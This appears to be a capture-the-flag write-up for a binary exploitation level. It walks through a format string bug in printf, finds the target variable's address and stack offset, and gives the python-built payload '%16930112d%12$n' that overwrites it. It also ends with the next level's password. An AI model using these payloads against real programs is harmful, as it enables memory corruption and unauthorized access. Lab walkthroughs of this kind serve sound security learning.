level4:


Looks the same yet some differences.

Main calls a n function, takes no params.

Then fgets input from user, then calls the pc function, which printf it (no format so exploit this)

then it checks if the m variable if its equal to another address.

The previous method can't work, cause the value 16930116 in the comparaison is too long. But with the modifier %d, we can dynamically specify the field width (like that : %16930116d).
        
first lets find the address of m

   0x0804848d <+54>:	mov    0x8049810,%eax
   0x08048492 <+59>:	cmp    $0x1025544,%eax

so its 0x8049810 !
little endian : \x10\x98\x04\x08

find where it is :

python -c 'print "BBBB" + " %x" * 20' > /tmp/exploit4

we found 42424242 at the 12th address !

so the padding looks like this : address of m (4 bytes), pad of 16930112-4 with %d + modifier %n to replace value.

so the only diff with level3 is the %d


python -c 'print "\x10\x98\x04\x08" + "%16930112d%12$n"' > /tmp/exploit4

no need to keep listening to stdin with - in the launch command cause it cats the .pass file directly

pass for level5 : 0f99ba5e9c446258a69b290407a6c60859e9c2d25b26575cafc9ae6d75e9456a